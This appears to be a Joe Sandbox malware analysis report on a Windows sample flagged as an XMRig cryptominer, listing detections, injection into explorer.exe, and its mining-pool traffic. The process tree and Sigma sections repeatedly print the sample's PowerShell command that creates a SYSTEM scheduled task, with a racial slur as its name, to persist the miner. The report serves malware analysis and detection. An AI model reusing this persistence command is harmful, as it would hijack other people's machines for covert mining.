Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe
Analysis ID:1394131
MD5:7e78c4388e398cd5113be95855753c9a
SHA1:ed6abdccf206689d48cc1adac47a3a71b100d822
SHA256:7fdcf0389689ae53b0ee7a302dc69963e7f5b3ce911b772792689b05d7f02f67
Tags:exe
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected Xmrig cryptocurrency miner
Detected Stratum mining protocol
Found hidden mapped module (file has been removed from disk)
Found strings related to Crypto-Mining
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Suspicious powershell command line found
Writes to foreign memory regions
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 1412 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zgpcu#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • m.exe (PID: 2724 cmdline: C:\Program Files\MINA\m.exe MD5: 7E78C4388E398CD5113BE95855753C9A)
    • conhost.exe (PID: 6728 cmdline: C:\Windows\System32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • explorer.exe (PID: 6444 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • powershell.exe (PID: 4040 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zgpcu#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 4296 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#kbbksn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 3304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • m.exe (PID: 2272 cmdline: C:\Program Files\MINA\m.exe MD5: 7E78C4388E398CD5113BE95855753C9A)
  • powershell.exe (PID: 6628 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zgpcu#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Windows\Temp\wbiwcikhpmwr.tmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      C:\Windows\Temp\wbiwcikhpmwr.tmpMacOS_Cryptominer_Xmrig_241780a1unknownunknown
      • 0x4cb268:$a1: mining.set_target
      • 0x4c6a48:$a2: XMRIG_HOSTNAME
      • 0x4c8540:$a3: Usage: xmrig [OPTIONS]
      • 0x4c6a20:$a4: XMRIG_VERSION
      C:\Windows\Temp\wbiwcikhpmwr.tmpMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
      • 0x4d1241:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
      C:\Windows\Temp\wbiwcikhpmwr.tmpMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
      • 0x4d17a0:$s1: %s/%s (Windows NT %lu.%lu
      • 0x4d1fc8:$s3: \\.\WinRing0_
      • 0x4ca4c8:$s4: pool_wallet
      • 0x4c62d0:$s5: cryptonight
      • 0x4c62e0:$s5: cryptonight
      • 0x4c62f0:$s5: cryptonight
      • 0x4c6300:$s5: cryptonight
      • 0x4c6318:$s5: cryptonight
      • 0x4c6328:$s5: cryptonight
      • 0x4c6338:$s5: cryptonight
      • 0x4c6350:$s5: cryptonight
      • 0x4c6360:$s5: cryptonight
      • 0x4c6378:$s5: cryptonight
      • 0x4c6390:$s5: cryptonight
      • 0x4c63a0:$s5: cryptonight
      • 0x4c63b0:$s5: cryptonight
      • 0x4c63c0:$s5: cryptonight
      • 0x4c63d8:$s5: cryptonight
      • 0x4c63f0:$s5: cryptonight
      • 0x4c6400:$s5: cryptonight
      • 0x4c6410:$s5: cryptonight

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      0000000D.00000002.4476974328.0000000001280000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        00000010.00000002.2634148822.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          00000010.00000002.2634148822.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmpMacOS_Cryptominer_Xmrig_241780a1unknownunknown
          • 0x4f0388:$a1: mining.set_target
          • 0x4ebb68:$a2: XMRIG_HOSTNAME
          • 0x4ed660:$a3: Usage: xmrig [OPTIONS]
          • 0x4ebb40:$a4: XMRIG_VERSION
          00000006.00000002.2224945388.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            00000006.00000002.2224945388.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmpMacOS_Cryptominer_Xmrig_241780a1unknownunknown
            • 0x4f0388:$a1: mining.set_target
            • 0x4ebb68:$a2: XMRIG_HOSTNAME
            • 0x4ed660:$a3: Usage: xmrig [OPTIONS]
            • 0x4ebb40:$a4: XMRIG_VERSION
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            16.2.m.exe.7ff7c8830120.1.raw.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
              16.2.m.exe.7ff7c8830120.1.raw.unpackMacOS_Cryptominer_Xmrig_241780a1unknownunknown
              • 0x4cb268:$a1: mining.set_target
              • 0x4c6a48:$a2: XMRIG_HOSTNAME
              • 0x4c8540:$a3: Usage: xmrig [OPTIONS]
              • 0x4c6a20:$a4: XMRIG_VERSION
              16.2.m.exe.7ff7c8830120.1.raw.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
              • 0x4d1241:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
              16.2.m.exe.7ff7c8830120.1.raw.unpackMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
              • 0x4d17a0:$s1: %s/%s (Windows NT %lu.%lu
              • 0x4d1fc8:$s3: \\.\WinRing0_
              • 0x4ca4c8:$s4: pool_wallet
              • 0x4c62d0:$s5: cryptonight
              • 0x4c62e0:$s5: cryptonight
              • 0x4c62f0:$s5: cryptonight
              • 0x4c6300:$s5: cryptonight
              • 0x4c6318:$s5: cryptonight
              • 0x4c6328:$s5: cryptonight
              • 0x4c6338:$s5: cryptonight
              • 0x4c6350:$s5: cryptonight
              • 0x4c6360:$s5: cryptonight
              • 0x4c6378:$s5: cryptonight
              • 0x4c6390:$s5: cryptonight
              • 0x4c63a0:$s5: cryptonight
              • 0x4c63b0:$s5: cryptonight
              • 0x4c63c0:$s5: cryptonight
              • 0x4c63d8:$s5: cryptonight
              • 0x4c63f0:$s5: cryptonight
              • 0x4c6400:$s5: cryptonight
              • 0x4c6410:$s5: cryptonight
              6.2.m.exe.7ff7c8830120.1.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                Click to see the 27 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Invoke-Obfuscation CLIP+ Launcher
                Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zgpcu#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zgpcu#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zgpcu#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; }, ProcessId: 1412, ProcessName: powershell.exe
                Sigma detected: Invoke-Obfuscation VAR+ Launcher
                Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zgpcu#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zgpcu#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zgpcu#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; }, ProcessId: 1412, ProcessName: powershell.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zgpcu#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zgpcu#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zgpcu#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MINEINEYNIGGA' /tr '''C:\Program Files\MINA\m.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\MINA\m.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MINEINEYNIGGA' -User 'System' -RunLevel 'Highest' -Force; }, ProcessId: 1412, ProcessName: powershell.exe

                Snort Signatures

                No Snort rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: SecuriteInfo.com.Win64.Evo-gen.32403.24162.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
                Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
                Antivirus detection for dropped file
                Source: C:\Program Files\MINA\m.exeAvira: detection malicious, Label: HEUR/AGEN.1329646
                Multi AV Scanner detection for dropped file
                Source: C:\Program Files\MINA\m.exeReversingLabs: Detection: 52%
                Source: C:\Program Files\MINA\m.exeVirustotal: Detection: 62%Perma Link
                Source: C:\Windows\Temp\wbiwcikhpmwr.tmpReversingLabs: Detection: 63%
                Source: C:\Windows\Temp\wbiwcikhpmwr.tmpVirustotal: Detection: 74%Perma Link
                Multi AV Scanner detection for submitted file
                Source: SecuriteInfo.com.Win64.Evo-gen.32403.24162.exeReversingLabs: Detection: 52%
                Source: SecuriteInfo.com.Win64.Evo-gen.32403.24162.exeVirustotal: Detection: 62%Perma Link
                Machine Learning detection for dropped file
                Source: C:\Program Files\MINA\m.exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: SecuriteInfo.com.Win64.Evo-gen.32403.24162.exeJoe Sandbox ML: detected

                Bitcoin Miner

                barindex
                Yara detected Xmrig cryptocurrency miner
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: Yara matchFile source: 16.2.m.exe.7ff7c8830120.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.m.exe.7ff7c8830120.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.m.exe.7ff7c8830120.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.m.exe.7ff7c8830120.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.m.exe.7ff7c882c840.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.m.exe.7ff7c882c840.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.m.exe.7ff7c87f0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.m.exe.7ff7c87f0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000D.00000002.4476974328.0000000001280000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.2634148822.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2224945388.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: m.exe PID: 2724, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 6444, type: MEMORYSTR
                Source: Yara matchFile source: C:\Windows\Temp\wbiwcikhpmwr.tmp, type: DROPPED
                Detected Stratum mining protocol
                Source: global trafficTCP traffic: 192.168.2.5:49712 -> 44.196.193.227:10128 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"4bbwanzjbugvgu37civtaw4gc9vjvvxdpdg68ybfkj1bxw3abbpnw42hb9msagziqabrcnee6uafyqxmmi71wkfr3aj1ahq","pass":"","agent":"xmrig/6.19.0 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/gpu","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}.
                Found strings related to Crypto-Mining
                Source: m.exe, 00000006.00000002.2224945388.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: losestratum+tcp://
                Source: m.exe, 00000006.00000002.2224945388.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: cryptonight/0
                Source: m.exe, 00000006.00000002.2224945388.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: losestratum+tcp://
                Source: m.exe, 00000006.00000002.2224945388.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: -o, --url=URL URL of mining server
                Source: m.exe, 00000006.00000002.2224945388.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
                Source: m.exe, 00000006.00000002.2224945388.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.32403.24162.exeDirectory created: C:\Program Files\MINAJump to behavior
                Source: C:\Program Files\MINA\m.exeDirectory created: C:\Program Files\Google\LibsJump to behavior
                Source: SecuriteInfo.com.Win64.Evo-gen.32403.24162.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: m.exe, 00000006.00000002.2224945388.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmp

                Networking

                barindex
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\explorer.exeNetwork Connect: 44.196.193.227 10128Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.5:49712 -> 44.196.193.227:10128
                Source: Joe Sandbox ViewIP Address: 44.196.193.227 44.196.193.227
                Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownDNS traffic detected: queries for: gulf.moneroocean.stream
                Source: m.exe, 00000006.00000002.2224945388.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
                Source: m.exe, 00000006.00000002.2224945388.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
                Source: m.exe, 00000006.00000002.2224945388.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
                Source: m.exe, 00000006.00000002.2224945388.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
                Source: powershell.exe, 00000002.00000002.2076905736.000002AF2D190000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000007.00000002.2122566660.000001F7BE869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000002.00000002.2059585880.000002AF1D349000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2122566660.000001F7BE869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                Source: powershell.exe, 00000002.00000002.2059585880.000002AF1D121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000002.00000002.2059585880.000002AF1D349000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2122566660.000001F7BE869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                Source: powershell.exe, 00000007.00000002.2122566660.000001F7BE869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000002.00000002.2081964848.000002AF357A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                Source: powershell.exe, 00000002.00000002.2059585880.000002AF1D121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000007.00000002.2122566660.000001F7BE869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                Source: powershell.exe, 00000002.00000002.2076905736.000002AF2D190000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000002.00000002.2076905736.000002AF2D190000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000002.00000002.2076905736.000002AF2D190000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000007.00000002.2122566660.000001F7BE869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000002.00000002.2076905736.000002AF2D190000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: m.exe, 00000006.00000002.2224945388.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
